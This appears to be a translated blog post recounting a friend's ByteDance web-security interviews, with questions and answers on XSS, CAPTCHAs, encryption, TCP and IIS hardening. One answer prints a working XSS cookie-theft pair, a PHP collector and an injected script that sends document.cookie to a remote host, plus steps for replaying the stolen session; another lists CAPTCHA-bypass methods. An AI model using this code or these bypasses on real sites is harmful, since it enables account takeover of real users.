Preface:

Some time ago, one of my friends went out for interviews again. This time he had a clear target: departments with large business volume and core business. He went to a lot of companies, including several big tech companies, and he said the one that impressed him most was ByteDance.

After three technical rounds and one HR round, he finally got an offer of 40K * 18 (monthly salary times months).

The first round focused on Web security basics, while the second and third rounds focused on his command of the corresponding penetration techniques and his business understanding of past projects. He was impressed because each round lasted more than an hour and a half, which he said really benefited him.

He chose ByteDance not only because it was a core project, but also because ByteDance’s benefits are touted as the best in the industry and its pay is among the highest in its category.

“High salary, good development and good welfare” seems to have become ByteDance’s label.

And many people think the big tech companies (dachang) have a high bar:

“With a ‘double non’ (non-985, non-211) degree you can’t get into a big company!”

“With less than three years of work experience you can’t get into a big company!”

“Those who didn’t major in the subject can’t get into a big company!”

But for this friend of mine, a ‘double non’ graduate, getting into ByteDance did not seem so hard. In his words, getting into a big company depends on one thing: technical strength.

You just need good technical skills and a good performance in the interview to get an Offer.

First round

1. What security problems can exist on a login page?

Weak passwords, brute forcing, SQL injection, sensitive information leakage.

2. Which programming language are you most familiar with?

Python, because I learned it most recently. Although I took some Java and C++ in the required courses, I don’t feel confident enough to claim them.

3. What have you done with Python?

Fortunately, I had written a simple POC in Python the month before.

4. Which libraries are commonly used when writing a POC?

re (regular expression library), requests (network request library)

5. How to prevent brute-force cracking?

Limit the number of login attempts and add multi-factor authentication.
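The “limit login attempts” half of that answer, as an added example that is not from the original post: an in-memory failed-attempt counter with a temporary lockout. The thresholds, the `checkPassword` stand-in and the explicit `now` clock parameter are this example’s own choices.

```javascript
// Added example (not from the original post): per-account failed-login counting
// with a temporary lockout. Thresholds below are constructed, not from the page.
const MAX_FAILURES = 5;             // failures tolerated inside the window
const WINDOW_MS = 15 * 60 * 1000;   // 15-minute sliding window
const LOCKOUT_MS = 30 * 60 * 1000;  // lock the account for 30 minutes after that

function makeLimiter() {
  const failures = new Map(); // username -> { times: [timestamps], lockedUntil }

  // Record one failed attempt at time `now` (ms); lock when the window is full.
  function record(username, now) {
    const entry = failures.get(username) || { times: [], lockedUntil: 0 };
    entry.times = entry.times.filter((t) => now - t < WINDOW_MS);
    entry.times.push(now);
    if (entry.times.length >= MAX_FAILURES) {
      entry.lockedUntil = now + LOCKOUT_MS;
      entry.times = [];
    }
    failures.set(username, entry);
  }

  function isLocked(username, now) {
    const entry = failures.get(username);
    return Boolean(entry) && entry.lockedUntil > now;
  }

  function reset(username) { failures.delete(username); }

  return { record, isLocked, reset };
}

// checkPassword is a stand-in for the real credential check (constructed here).
// Returns 'LOCKED', 'FAILED' or 'OK'; a real service would now ask for the second factor.
function login(limiter, checkPassword, username, password, now) {
  if (limiter.isLocked(username, now)) return 'LOCKED';
  if (!checkPassword(username, password)) {
    limiter.record(username, now);
    return 'FAILED';
  }
  limiter.reset(username);
  return 'OK';
}
```

A per-account lockout can itself be abused to lock legitimate users out, so production systems usually pair it with per-source throttling and the second authentication factor the answer mentions.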

6. What are the ways to bypass a CAPTCHA?

Skip the CAPTCHA: access the required page content directly without going through the verification step.

The request header contains the CAPTCHA: on some sites the CAPTCHA is shown in the foreground while the value generated by the JS validation server is placed in the request header; the header can be retrieved and the CAPTCHA parsed out of it.

The session is not refreshed: some sites serve the requested resource directly once the CAPTCHA has been verified, so a cookie and CAPTCHA can be set in advance and reused to access the site. Where multithreading cannot be controlled, and on sites that expire the CAPTCHA if it is not used for a while, this can be handled by adding a timed access routine.

Use third-party plug-ins: on some sites the CAPTCHA is simple, containing only Arabic numerals and English letters, and can be recognized with third-party OCR libraries, for example Tess4J or Tesseract.

Some sites’ CAPTCHAs are picked at random from a fixed library. For such static CAPTCHAs you can build your own library that maps each image to its answer and look the answer up in a map.

7. The command to view the current directory in Windows?

dir

8. View the current directory on Linux?

pwd

9. View the details and permissions of the files in the current directory?

ls -al

10. What part are you responsible for in CTF?

I play support…

11. Do you work out the CTF challenges independently?

Of course.

To put it another way: even if you don’t go to a big company, if you want to go further on the technical road, become a technical leader and build big systems, you have to get the basics right.

In penetration testing, port scanning, vulnerability scanning, intrusion detection, red team attack, blue team defense and so on are all tied to network protocols. Therefore it is very important for penetration testers to learn the fundamentals; that is a necessary skill for becoming a top expert.

Out of 10 programmers, 10 say they have studied network security and 9 say they understand it. But in a real interview, maybe only two or three of them can answer the relevant questions, such as:

“What is the difference between TCP and UDP?” “What is the underlying principle of HTTPS?” “What transport and serialization protocols are used in Ali’s Dubbo framework?”

Can you answer all these questions? In fact, anyone who has interviewed at large companies, whether domestic Internet companies or Silicon Valley IT companies, should be clear about how much the interview asks about basic knowledge.

This is not hard to understand: after all, the big companies pay more attention to a programmer’s fundamental skills, and almost every running program involves network protocols, so once one is used wrongly it can easily have disastrous consequences.

Here’s an example:

Many people have been troubled by “technology changes too fast and becomes obsolete”: from search engines, big data and cloud computing to artificial intelligence, blockchain and so on. In fact, many technologies only seem spectacular. Stripped of their coat, the essence is the basic knowledge and core concepts of computer organization principles, operating systems, network protocols, data structures and algorithms.

The way to avoid being swept away by new technologies is to master the essential knowledge. It won’t get you a job as easily as “Learn MySQL in X days,” but it is the knowledge that will still be valuable after you’re 40.

Second and third rounds

What is the penetration testing process? (Overview of the penetration testing process)

The pre-engagement interaction stage, the intelligence gathering stage, the threat modeling stage, the vulnerability analysis stage, the exploitation stage, the post-exploitation stage (how to keep control and maintain access), and the reporting stage.

Before the attack: network reconnaissance, network scanning, network enumeration

During the attack: use the vulnerability information to carry out penetration attacks and obtain privileges

After the attack: post-exploitation persistence, file copying, Trojan implantation, trace erasure

How is XSS defended?

1. Filter and encode the front-end input: for example, only allow the specified types of characters, such as the format of a phone number or the limits on a registered user name. The input check must be completed on the server side, because a limit implemented only in the front end is easy to bypass; filter and escape special characters.

2. Filter and encode the output: encode and escape variable values when they are output into the front-end HTML.

3. Use HttpOnly for key cookies.
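The three defences above in working form, as an added example that is not from the original post: a server-side allow-list check, HTML output encoding, and an HttpOnly session cookie. The allow-list patterns, function names and the sample payload are this example’s own.

```javascript
// Added example (not from the original post): the three XSS defences from the answer,
// written for Node.js. The allow-list rules below are constructed for illustration.

// 1. Server-side input check: allow-list the format instead of trusting the front end.
const RULES = {
  phone: /^1[3-9]\d{9}$/,            // constructed rule: 11-digit mobile number
  username: /^[A-Za-z0-9_]{3,16}$/,  // constructed rule: letters, digits, underscore
};
function validateInput(field, value) {
  const rule = RULES[field];
  return Boolean(rule) && typeof value === 'string' && rule.test(value);
}

// 2. Output encoding: escape every character that can open a tag or break out of a
//    quoted attribute before a variable is interpolated into HTML.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}
function renderGreeting(username) {
  return `<p>Welcome, ${escapeHtml(username)}</p>`;
}

// 3. HttpOnly (with Secure and SameSite) on the session cookie, so document.cookie
//    cannot read it even if a script injection does get through.
function sessionCookieHeader(sessionId) {
  return `session=${encodeURIComponent(sessionId)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Demonstration with a constructed payload.
const payload = '<img src=x onerror="alert(1)">';
console.log(validateInput('username', payload)); // false: rejected before it is stored
console.log(renderGreeting(payload));            // rendered as inert text, not a tag
console.log(sessionCookieHeader('abc123'));
```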

Symmetric encryption vs. asymmetric encryption?

Symmetric encryption: encryption and decryption use the same key; key management is complex (N(N-1)/2 keys for N users); it is not suitable for transmitting keys over the Internet; encryption and decryption are efficient. Used to encrypt data.

Asymmetric encryption: the private key cannot be derived from the public key, and each user has an asymmetric key pair. The public key can be transmitted over the Internet, but encryption is inefficient. Used for digital signatures and encryption.

Where do cookies live? Can I open them?

C:\Users\<user name>\AppData\Roaming\Microsoft\Windows\Cookies. Tools – Folder Options – View – uncheck “Hide protected operating system files” and you will see the Cookies folder.

How does XSS steal cookies?

Attacker side (cookie.php):

<?php
$cookie = $_GET['cookie'];
$time = date('Y-m-d g:i:s');
$referer = getenv('HTTP_REFERER');
$cookietxt = fopen('cookie.txt', 'a');
fwrite($cookietxt, "time:" . $time . " cookie:" . $cookie . " referer:" . $referer . "\r\n");
fclose($cookietxt);
?>

Note the double quotation marks; they are error-prone.

Script side (injected into the page):

<script>
document.write('<img src="http://ip/cookie.php?cookie=' + document.cookie + '" width=0 height=0 border=0 />');
</script>

After obtaining the cookie, use Firebug to find the cookie, create a cookie with the stolen value, add it, submit with the referer, and log in directly without entering the account and password.

What protection measures should be taken for an IIS server?

  1. Keep Windows upgraded
  2. Use the IIS defense tool
  3. Remove the default Web site
  4. If you do not need the FTP and SMTP services, uninstall them
  5. Check your admin groups and services regularly
  6. Strictly control write access permissions on the server
  7. Set complex passwords
  8. Reduce or eliminate sharing on the Web server
  9. Disable NetBIOS over TCP/IP
  10. Block unused TCP ports
  11. Double-check *.bat and *.exe files: search for *.bat once a week
  12. Manage IIS directory security
  13. Use NTFS security
  14. Manage user accounts
  15. Audit your Web server

TCP handshake protocol:

In the TCP/IP protocol suite, TCP provides a reliable connection service and uses the three-way handshake to establish a connection.

First handshake: when establishing a connection, the client sends a SYN packet (SYN = J) to the server and enters the SYN_SENT state, waiting for confirmation from the server.

Second handshake: after receiving the SYN packet, the server must acknowledge the client’s SYN (ACK = J + 1) and also send its own SYN packet (SYN = K), i.e. a SYN+ACK packet. The server then enters the SYN_RECV state.

Third handshake: after receiving the SYN+ACK packet from the server, the client sends an ACK packet (ACK = K + 1) to the server. After this packet is sent, the client and the server enter the ESTABLISHED state, completing the three-way handshake.
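The exchange described above as an added example that is not from the original post: a minimal model of the handshake state machine with the sequence numbers J and K and the states SYN_SENT, SYN_RECV and ESTABLISHED. Segments are plain objects and the initial sequence numbers are constructed; the function names are this example’s own.

```javascript
// Added example (not from the original post): a model of the TCP three-way handshake
// with sequence numbers J and K. Segments are plain objects; this demonstrates the
// state transitions and acknowledgement checks, it is not a socket implementation.

function makeEndpoint(name, isn) {
  return { name, isn, state: 'CLOSED', peerIsn: null };
}

// 1st handshake: the client sends SYN with seq = J and waits in SYN_SENT.
function clientSendSyn(client) {
  client.state = 'SYN_SENT';
  return { flags: ['SYN'], seq: client.isn };
}

// 2nd handshake: the server acknowledges J with ack = J + 1 and sends its own SYN, seq = K.
function serverOnSyn(server, seg) {
  if (!seg.flags.includes('SYN')) throw new Error(`${server.name}: expected SYN`);
  server.peerIsn = seg.seq;
  server.state = 'SYN_RECV';
  return { flags: ['SYN', 'ACK'], seq: server.isn, ack: seg.seq + 1 };
}

// 3rd handshake: the client checks ack == J + 1, then acknowledges K with ack = K + 1.
function clientOnSynAck(client, seg) {
  if (client.state !== 'SYN_SENT') throw new Error(`${client.name}: not in SYN_SENT`);
  if (seg.ack !== client.isn + 1) throw new Error(`${client.name}: bad ack ${seg.ack}`);
  client.peerIsn = seg.seq;
  client.state = 'ESTABLISHED';
  return { flags: ['ACK'], seq: client.isn + 1, ack: seg.seq + 1 };
}

// The server reaches ESTABLISHED only if the final ACK acknowledges exactly K + 1;
// a guessed or stale acknowledgement number is rejected here.
function serverOnAck(server, seg) {
  if (server.state !== 'SYN_RECV') throw new Error(`${server.name}: not in SYN_RECV`);
  if (seg.ack !== server.isn + 1) throw new Error(`${server.name}: bad ack ${seg.ack}`);
  server.state = 'ESTABLISHED';
}

// Run the whole exchange with constructed initial sequence numbers J and K.
function handshake(j, k) {
  const client = makeEndpoint('client', j);
  const server = makeEndpoint('server', k);
  const synAck = serverOnSyn(server, clientSendSyn(client));
  serverOnAck(server, clientOnSynAck(client, synAck));
  return { client: client.state, server: server.state };
}

console.log(handshake(1000, 5000)); // { client: 'ESTABLISHED', server: 'ESTABLISHED' }
```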

How was DVWA set up?

Start XAMPP (XAMPP, i.e. Apache + MySQL + PHP + Perl, is a powerful integrated package for building sites). Put DVWA in the htdocs directory of XAMPP and open http://127.0.0.1/dvwa in the browser.

There is also the OWASP vulnerability practice platform: sourceforge.net/projects/ow…

Can XSS log in with cookies, without a user name and password?

Almost. Because the cookie value is handed to the browser, the browser will use the existing cookie to access the page. If the cookie is valid, it goes straight into the page.

HR side

1. Future career plans

2. When to make functional changes.

3. How is the value of doing security services for customers reflected, and what problems are solved for customers?

4. Penetration testing and code audit at work

Primary — vulnerability scanning; Intermediate — independent penetration testing capability; Advanced — code audit projects

Learning roadmap

Interview experience notes

Penetration kit

Network Security Primer to Advanced Book (HD PDF version)

SRC Vulnerability Summary

Web security learning video

Emergency Response Notes
